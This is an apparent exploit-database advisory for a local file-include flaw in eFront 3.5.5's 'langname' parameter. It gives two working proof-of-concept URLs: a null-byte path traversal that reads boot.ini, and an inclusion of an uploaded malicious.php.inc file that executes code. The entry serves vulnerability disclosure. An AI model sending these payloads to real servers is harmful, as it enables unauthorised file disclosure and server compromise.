eFront 3.5.5 - 'langname' Parameter Local File Include Vulnerability

2010-03-17
ID: 55184
Download vulnerable application: None
source: http://www.securityfocus.com/bid/38787/info

eFront is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

eFront 3.5.5 and prior are vulnerable. 

http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=a/../../../../../../boot.ini%00
http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=../../../../upload/student/message_attachments/Sent/1266862529/malicious.php.inc%00
1-4-2 (www02)